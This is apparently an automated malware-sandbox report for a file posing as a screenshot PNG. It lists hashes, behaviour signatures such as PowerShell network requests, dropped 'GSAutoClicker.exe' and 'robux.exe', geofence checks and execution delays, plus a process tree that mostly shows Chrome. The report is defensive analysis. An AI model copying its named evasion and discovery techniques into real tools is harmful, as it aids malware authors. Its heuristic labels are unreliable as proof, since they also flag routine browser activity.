Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
18/01/2025, 18:30
250118-w5xvqa1qdk 818/01/2025, 18:01
250118-wmdn5azlcs 818/01/2025, 17:59
250118-wk5pts1lbr 1018/01/2025, 15:49
250118-s9gshsykar 1018/01/2025, 15:28
250118-swm3daxqbn 818/01/2025, 15:20
250118-sq4g6swpet 818/01/2025, 15:17
250118-spg8jsxnhn 818/01/2025, 15:15
250118-smwcdsxnek 718/01/2025, 15:12
250118-slc5esxnbp 1018/01/2025, 15:09
250118-sjqyhaxmgr 7Analysis
-
max time kernel
349s -
max time network
412s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
18/01/2025, 15:20
Static task
static1
Errors
General
-
Target
Знімок екрана 2025-01-17 164150.png
-
Size
89KB
-
MD5
bc6ca19d49bf9037ac632b050e2c7b36
-
SHA1
3505656078d7dab8cb4e8a0987113d7d146d9cde
-
SHA256
fc5bca3c384922d0d27ba63e56e22c4463206cbbf90ee50a115e644278837420
-
SHA512
9ab597c0d067c7ce438ab8e0d7d554124612b85a4e66640e979677866f9dfde48489c33120e75ec902fc6bc85b3616cbd53bf6e9d03457ebc1f4d20e25cd9f4d
-
SSDEEP
1536:zgmr9TL/IDgOTLEU3uaMSnu2YsA3DNq3EcUfeEoCTWoOkS00zsRh3XY3/+hAOAf:8mr9TCTxrANot6eEzq7kS0dXY3sAf
Malware Config
Signatures
-
Blocklisted process makes network request 10 IoCs
flow pid Process 985 6056 powershell.exe 987 6056 powershell.exe 988 4404 powershell.exe 989 4404 powershell.exe 999 4848 powershell.exe 1001 4848 powershell.exe 1002 6908 powershell.exe 1003 6908 powershell.exe 1004 3804 powershell.exe 1005 3804 powershell.exe -
pid Process 4404 powershell.exe 4848 powershell.exe 6908 powershell.exe 3804 powershell.exe 6056 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 3452 GSAutoClicker.exe -
Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
flow ioc 471 https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\e90ea6d9-0549-4052-8b55-401310689e64.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250118152240.pma setup.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GSAutoClicker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language robux.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language robux.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language robux.exe -
Delays execution with timeout.exe 11 IoCs
pid Process 3108 timeout.exe 5208 timeout.exe 1508 timeout.exe 5300 timeout.exe 5980 timeout.exe 2884 timeout.exe 6260 timeout.exe 1304 timeout.exe 6080 timeout.exe 7016 timeout.exe 6900 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133816872736067731" chrome.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2503671516-4119152987-701077851-1000\{998C0E8C-0949-4D16-9878-DE9699F445F3} chrome.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2503671516-4119152987-701077851-1000_Classes\Local Settings chrome.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 4948 mspaint.exe 4948 mspaint.exe 1236 chrome.exe 1236 chrome.exe 3724 chrome.exe 3724 chrome.exe 3724 chrome.exe 3724 chrome.exe 6164 msedge.exe 6164 msedge.exe 6576 msedge.exe 6576 msedge.exe 6972 identity_helper.exe 6972 identity_helper.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 6056 powershell.exe 6056 powershell.exe 6056 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 5176 mspaint.exe 5176 mspaint.exe 6908 powershell.exe 6908 powershell.exe 6908 powershell.exe 3804 powershell.exe 3804 powershell.exe 3804 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 3452 GSAutoClicker.exe 4732 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe Token: SeShutdownPrivilege 1236 chrome.exe Token: SeCreatePagefilePrivilege 1236 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe -
Suspicious use of SendNotifyMessage 63 IoCs
pid Process 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 1236 chrome.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 3452 GSAutoClicker.exe 1956 SndVol.exe 1956 SndVol.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4948 mspaint.exe 4948 mspaint.exe 4948 mspaint.exe 4948 mspaint.exe 5176 mspaint.exe 5176 mspaint.exe 5176 mspaint.exe 5176 mspaint.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 928 wrote to memory of 4948 928 cmd.exe 84 PID 928 wrote to memory of 4948 928 cmd.exe 84 PID 1236 wrote to memory of 3724 1236 chrome.exe 92 PID 1236 wrote to memory of 3724 1236 chrome.exe 92 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 3760 1236 chrome.exe 93 PID 1236 wrote to memory of 4792 1236 chrome.exe 94 PID 1236 wrote to memory of 4792 1236 chrome.exe 94 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 PID 1236 wrote to memory of 2476 1236 chrome.exe 95 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Знімок екрана 2025-01-17 164150.png"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\Знімок екрана 2025-01-17 164150.png"2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4948
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:1104
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffb3b0acc40,0x7ffb3b0acc4c,0x7ffb3b0acc582⤵
- Suspicious behavior: EnumeratesProcesses
PID:3724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1816,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=1812 /prefetch:22⤵PID:3760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2404 /prefetch:32⤵PID:4792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2412 /prefetch:82⤵PID:2476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3172 /prefetch:12⤵PID:3360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3200 /prefetch:12⤵PID:3396
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4540,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4504 /prefetch:12⤵PID:3600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4860,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4868 /prefetch:82⤵PID:324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5060,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5092 /prefetch:82⤵PID:1380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5164,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5204 /prefetch:12⤵PID:2628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4568,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4044 /prefetch:12⤵PID:1716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5400,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5104 /prefetch:12⤵PID:1380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5460,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5468 /prefetch:82⤵PID:2032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5540,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5380 /prefetch:12⤵PID:980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5632,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5184 /prefetch:12⤵PID:2264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5704,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5748 /prefetch:12⤵PID:5084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5772,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5892 /prefetch:12⤵PID:560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5768,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5708 /prefetch:12⤵PID:4848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6188,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=6212 /prefetch:12⤵PID:1968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6332,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=6328 /prefetch:12⤵PID:3116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6540,i,8272534600387337464,4516864815682585413,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=6532 /prefetch:12⤵PID:4092
-
-
